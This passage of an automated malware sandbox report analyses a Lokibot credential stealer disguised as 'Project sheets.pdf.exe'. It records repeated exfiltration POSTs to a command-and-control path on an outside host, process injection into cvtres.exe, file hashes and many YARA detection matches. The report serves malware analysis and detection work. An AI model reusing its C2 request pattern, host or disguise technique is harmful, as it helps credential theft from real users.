                  Aug 11, 2022 06:44:07.789189100 CEST9879OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:07.921392918 CEST9880INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NwDeet%2BtDovGzYKRHtlc%2BIy9CvtPPAj%2FIhJEPstX1Ci1BEnwzlCsGh%2BuTY0Brr6ZBfTS8J8wHhv9vdUzelvtptMWlvXbpzGKUv3k3lh%2FjuysDwLv3KXOt2JS1GaA8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5074b917bb5b-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  72192.168.2.349897188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:08.828123093 CEST9881OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:08.957175970 CEST9882INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c0pX9SJrHopzRCsEkDmDxwlNx0C41KoS8krJ5OgxEsOqET4277iXRW3J%2FWp2JHcXROzAxWooOe8cWiTJpbpDaNfjHGikivIw5A1OpyJxaquuggPEYvGU5TP02bgBIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e507b3f7b91d8-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  73192.168.2.349898188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:44:09.907279015 CEST9882OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:10.024667978 CEST9883INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A8uhSCBmIXKRlfuG%2F6EDgs3Nh9LOjKk3NdY%2BN9yfSiF3S03bDoGetakChdva7ldiD%2BvTJDuSTvIs7znKB4Lzu7%2BAAco8%2BiNoqOwzPZxCDqD3J%2FLSBTi0p%2Fy1e7TDzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5081f8b99b98-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.349750188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:21.832277060 CEST1041OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:21.929147005 CEST1042INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G8RWXJ9cQ2lTbZIEiakeL%2BvJlw7GBQj5v6W8jHCN0RVD8MFGd3iAhGRjGRgY3kgjTkeYk5seGXg0mRicQQEFnc%2Fe90OlZ%2BzjF7i0rG%2F%2F5CMfbS%2FOvsPqEIVJpPmwCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dde7991906c-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.349751188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:22.964431047 CEST1043OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:23.073542118 CEST1044INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NuFLm1%2BetFHr9%2F4RJj%2BfSY56%2Fyp%2F44kO%2BagWi8qLS5jmc3FWNYuuuS4dryA9ihrHDUpS5jRl4o9C1ZwUh9G2L3ovG1mleSN4EqUy7Wz4Vh32S1WXkdj5%2B7O52BO4hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4de58e089025-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Click to jump to process

                  Target ID:0
                  Start time:06:42:05
                  Start date:11/08/2022
                  Path:C:\Users\user\Desktop\Project sheets.pdf.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Project sheets.pdf.exe"
                  Imagebase:0xe40000
                  File size:177696 bytes
                  MD5 hash:B9FF215D1D69D1A6D7568EECC3ECD245
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:1
                  Start time:06:42:07
                  Start date:11/08/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Imagebase:0xa40000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Target ID:2
                  Start time:06:42:08
                  Start date:11/08/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Imagebase:0xa40000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Target ID:3
                  Start time:06:42:08
                  Start date:11/08/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Imagebase:0xa40000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  No disassembly